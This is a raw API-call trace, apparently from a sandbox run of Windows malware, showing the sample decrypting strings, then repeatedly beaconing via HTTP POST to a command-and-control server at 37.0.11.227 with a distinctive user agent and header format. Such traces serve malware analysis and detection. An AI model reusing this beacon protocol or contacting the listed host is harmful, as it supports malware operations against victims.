LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.541] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0186.542] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.542] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0186.543] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.543] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0186.544] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.544] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0186.544] GetProcessHeap () returned 0x690000 [0186.544] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0186.544] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0186.544] GetProcessHeap () returned 0x690000 [0186.545] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0186.545] GetProcessHeap () returned 0x690000 [0186.545] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0186.545] GetProcessHeap () returned 0x690000 [0186.545] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0186.545] GetProcessHeap () returned 0x690000 [0186.545] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0186.546] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.546] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0186.551] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.551] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0186.556] GetProcessHeap () returned 0x690000 [0186.556] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0186.557] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.558] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0186.558] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.558] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0186.559] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.559] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0186.559] GetProcessHeap () returned 0x690000 [0186.560] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0186.560] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.560] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0186.561] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.561] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0186.562] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.562] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0186.562] GetProcessHeap () returned 0x690000 [0186.562] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0186.563] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.563] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0186.564] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.564] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0186.564] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.565] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0186.565] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.566] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0186.566] GetProcessHeap () returned 0x690000 [0186.566] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0186.566] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b37e0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0186.566] GetProcessHeap () returned 0x690000 [0186.566] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab330 [0186.566] socket (af=2, type=1, protocol=6) returned 0x348 [0186.566] connect (s=0x348, name=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0186.607] FreeAddrInfoW (pAddrInfo=0x6b37e0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0186.607] GetProcessHeap () returned 0x690000 [0186.607] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0186.607] GetProcessHeap () returned 0x690000 [0186.607] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b3f90 [0186.608] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0186.609] wvsprintfA (in: param_1=0x6b3f90, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0186.609] GetProcessHeap () returned 0x690000 [0186.609] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afe00 [0186.609] GetProcessHeap () returned 0x690000 [0186.610] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b3f90 | out: hHeap=0x690000) returned 1 [0186.610] GetProcessHeap () returned 0x690000 [0186.610] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0186.610] GetProcessHeap () returned 0x690000 [0186.610] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b3f90 [0186.611] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0186.611] wvsprintfA (in: param_1=0x6b3f90, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0186.611] GetProcessHeap () returned 0x690000 [0186.611] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0186.611] GetProcessHeap () returned 0x690000 [0186.612] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b3f90 | out: hHeap=0x690000) returned 1 [0186.612] send (s=0x348, buf=0x6abd08*, len=242, flags=0) returned 242 [0186.612] send (s=0x348, buf=0x6aba40*, len=159, flags=0) returned 159 [0186.612] GetProcessHeap () returned 0x690000 [0186.612] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b27b0 [0186.612] recv (in: s=0x348, buf=0x6b27b0, len=4048, flags=0 | out: buf=0x6b27b0*) returned 204 [0186.727] GetProcessHeap () returned 0x690000 [0186.727] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0186.727] GetProcessHeap () returned 0x690000 [0186.728] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0186.728] GetProcessHeap () returned 0x690000 [0186.728] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afe00 | out: hHeap=0x690000) returned 1 [0186.728] GetProcessHeap () returned 0x690000 [0186.728] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0186.728] closesocket (s=0x348) returned 0 [0186.729] GetProcessHeap () returned 0x690000 [0186.729] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab330 | out: hHeap=0x690000) returned 1 [0186.729] GetProcessHeap () returned 0x690000 [0186.729] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0186.730] GetProcessHeap () returned 0x690000 [0186.730] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0186.730] GetProcessHeap () returned 0x690000 [0186.730] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0186.731] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b27b0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1084) returned 0x348 [0186.733] Sleep (dwMilliseconds=0xea60) [0186.734] GetProcessHeap () returned 0x690000 [0186.734] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0186.735] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.735] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0186.756] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.756] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0186.764] GetProcessHeap () returned 0x690000 [0186.765] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0186.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.766] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0186.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.767] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0186.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.768] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0186.768] GetProcessHeap () returned 0x690000 [0186.769] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0186.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.770] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0186.770] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.771] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0186.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.772] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0186.772] GetProcessHeap () returned 0x690000 [0186.772] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0186.774] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.774] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0186.775] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.775] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0186.787] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.788] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0186.789] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.789] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0186.789] GetProcessHeap () returned 0x690000 [0186.789] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0186.789] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0186.790] GetProcessHeap () returned 0x690000 [0186.791] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0186.791] GetProcessHeap () returned 0x690000 [0186.791] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0186.791] GetProcessHeap () returned 0x690000 [0186.792] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0186.792] GetProcessHeap () returned 0x690000 [0186.792] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0186.793] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.793] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0186.802] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.802] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0186.818] GetProcessHeap () returned 0x690000 [0186.818] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0186.819] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.819] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0186.820] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.820] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0186.821] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.821] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0186.822] GetProcessHeap () returned 0x690000 [0186.822] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0186.823] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.823] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0186.824] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.825] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0186.825] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.826] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0186.826] GetProcessHeap () returned 0x690000 [0186.826] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0186.828] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.828] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0186.829] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.829] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0186.830] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.831] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0186.832] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.832] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0186.832] GetProcessHeap () returned 0x690000 [0186.832] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0186.832] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3a88*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8b0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0186.832] GetProcessHeap () returned 0x690000 [0186.832] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3f0 [0186.832] socket (af=2, type=1, protocol=6) returned 0x34c [0186.833] connect (s=0x34c, name=0x6ae8b0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0186.857] FreeAddrInfoW (pAddrInfo=0x6b3a88*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8b0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0186.857] GetProcessHeap () returned 0x690000 [0186.857] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0186.857] GetProcessHeap () returned 0x690000 [0186.857] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b3f90 [0186.857] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0186.858] wvsprintfA (in: param_1=0x6b3f90, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0186.858] GetProcessHeap () returned 0x690000 [0186.858] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0186.858] GetProcessHeap () returned 0x690000 [0186.859] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b3f90 | out: hHeap=0x690000) returned 1 [0186.859] GetProcessHeap () returned 0x690000 [0186.859] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0186.859] GetProcessHeap () returned 0x690000 [0186.859] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b3f90 [0186.860] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0186.860] wvsprintfA (in: param_1=0x6b3f90, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0186.860] GetProcessHeap () returned 0x690000 [0186.860] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0186.861] GetProcessHeap () returned 0x690000 [0186.861] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b3f90 | out: hHeap=0x690000) returned 1 [0186.861] send (s=0x34c, buf=0x6abd08*, len=242, flags=0) returned 242 [0186.862] send (s=0x34c, buf=0x6aba40*, len=159, flags=0) returned 159 [0186.862] GetProcessHeap () returned 0x690000 [0186.862] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b27b0 [0186.862] recv (in: s=0x34c, buf=0x6b27b0, len=4048, flags=0 | out: buf=0x6b27b0*) returned 204 [0186.930] GetProcessHeap () returned 0x690000 [0186.930] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0186.931] GetProcessHeap () returned 0x690000 [0186.931] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0186.931] GetProcessHeap () returned 0x690000 [0186.932] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0186.932] GetProcessHeap () returned 0x690000 [0186.932] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0186.932] closesocket (s=0x34c) returned 0 [0186.933] GetProcessHeap () returned 0x690000 [0186.933] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3f0 | out: hHeap=0x690000) returned 1 [0186.933] GetProcessHeap () returned 0x690000 [0186.934] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0186.934] GetProcessHeap () returned 0x690000 [0186.934] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0186.934] GetProcessHeap () returned 0x690000 [0186.935] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0186.935] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b27b0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc84) returned 0x34c [0186.939] Sleep (dwMilliseconds=0xea60) [0186.947] GetProcessHeap () returned 0x690000 [0186.947] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0186.948] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.949] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0186.955] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.956] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0186.966] GetProcessHeap () returned 0x690000 [0186.966] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0186.966] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.967] CryptImportKey (in: hProv=0x6af078, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0186.968] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.968] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0186.969] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.969] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0186.969] GetProcessHeap () returned 0x690000 [0186.970] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0186.970] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.971] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0186.972] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.979] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0186.980] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.980] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0186.981] GetProcessHeap () returned 0x690000 [0186.981] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0186.981] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.982] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0186.983] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.983] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0186.984] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.984] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0186.988] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.988] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0186.988] GetProcessHeap () returned 0x690000 [0186.988] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) 